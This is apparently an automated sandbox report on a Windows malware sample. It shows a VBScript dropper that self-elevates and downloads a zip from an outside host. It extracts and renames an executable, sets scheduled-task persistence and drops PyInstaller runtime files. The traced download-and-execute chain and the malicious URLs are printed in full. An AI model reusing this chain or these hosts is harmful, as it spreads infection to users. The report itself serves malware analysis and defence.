Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318488555.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419930594.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314047620.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406701336.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318266888.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419793049.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2321357657.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420845388.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\select.pdb source: bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3398021274.00007FFDA5B93000.00000002.00000001.01000000.00000014.sdmp, registry_4131f52c.exe, 00000017.00000003.2430566039.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3397663069.00007FFDA4DA3000.00000002.00000001.01000000.00000029.sdmp, select.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317125984.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417579847.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316376608.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2409520861.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313340825.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406237358.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbrc source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314297640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406875328.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314730096.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407332641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318875173.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420233729.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: bOamY.exe, 0000000F.00000003.2315769153.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407806029.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F67DB000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317465589.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418017150.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\Deolane-Vide", "", "runas", "1");
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("https://estudosadulto.educacao.ws/deola", "", "", "open", "1");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Exists("elevated");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IShellDispatch6.ShellExecute("https://estudosadulto.educacao.ws/deola", "", "", "open", "1");IWinHttpRequest.Open("GET", "https://almeidadoprogresso.siteoficial.ws/wsx.zip", "false");IWinHttpRequest.Send();IWinHttpRequest.Status();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\4wToa.zip", "2");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Exists("elevated");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IShellDispatch6.ShellExecute("https://estudosadulto.educacao.ws/deola", "", "", "open", "1");IWinHttpRequest.Open("GET", "https://almeidadoprogresso.siteoficial.ws/wsx.zip", "false");IWinHttpRequest.Send();IWinHttpRequest.Status();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\4wToa.zip", "2");_Stream.Close();IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Exists("elevated");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IShellDispatch6.ShellExecute("https://estudosadulto.educacao.ws/deola", "", "", "open", "1");IWinHttpRequest.Open("GET", "https://almeidadoprogresso.siteoficial.ws/wsx.zip", "false");IWinHttpRequest.Send();IWinHttpRequest.Status();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\4wToa.zip", "2");_Stream.Close();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\4wToa.zip");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\n0EifhO_extraido");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\n0EifhO_extraido");IShellDispatch6.NameSpace("C:\Users\user\AppData\Local\Temp\4wToa.zip");IShellDispatch6.NameSpace("C:\Users\user\AppData\Local\Temp\n0EifhO_extraido");Folder3.Items();Folder3.CopyHere("Unsupported parameter type 00000009", "16");IHost.Sleep("5000");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\wsx.exe");IFileSystem3.MoveFile("C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\wsx.exe", "C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe");IWshShell3.Run("schtasks /create /tn XHdU9gx7 /tr "C:\Users\user\AppData\Local\Temp\n0", "0", "true")
Binary contains a suspicious time stamp
Source: api-ms-win-core-console-l1-1-0.dll.15.dr Static PE information: 0x6F5B3627 [Thu Mar 15 05:56:55 2029 UTC]
PE file contains sections with non-standard names
Source: wsx.exe.4.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.15.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.15.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.15.dr Static PE information: section name: .00cfg
Source: registry_4131f52c.exe.16.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.23.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.23.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.23.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3595B81 push rcx; ret 16_2_00007FFDA3595B82
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA38B126A push qword ptr [rdi+rbp-01h]; ret 16_2_00007FFDA38B126F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838C126A push qword ptr [rdi+rbp-01h]; ret 24_2_00007FFD838C126F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838EE636 push rdi; ret 24_2_00007FFD838EE642
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD838EEB55 push rdi; ret 24_2_00007FFD838EEB5B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F5B81 push rcx; ret 24_2_00007FFD932F5B82
Drops PE files
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\bcrypt\_bcrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography\hazmat\bindings\_openssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\win32wnet.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md__mypyc.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32\pywintypes38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\charset_normalizer\md.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\python3.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\wsx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\VCRUNTIME140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\VCRUNTIME140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\win32wnet.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\pywin32_system32\pywintypes38.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\libffi-7.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography\hazmat\bindings\_openssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_cffi_backend.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-fibers-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\charset_normalizer\md__mypyc.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-fibers-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe File created: C:\Users\user\AppData\Local\Temp\_MEI79002\_ctypes.pyd Jump to dropped file
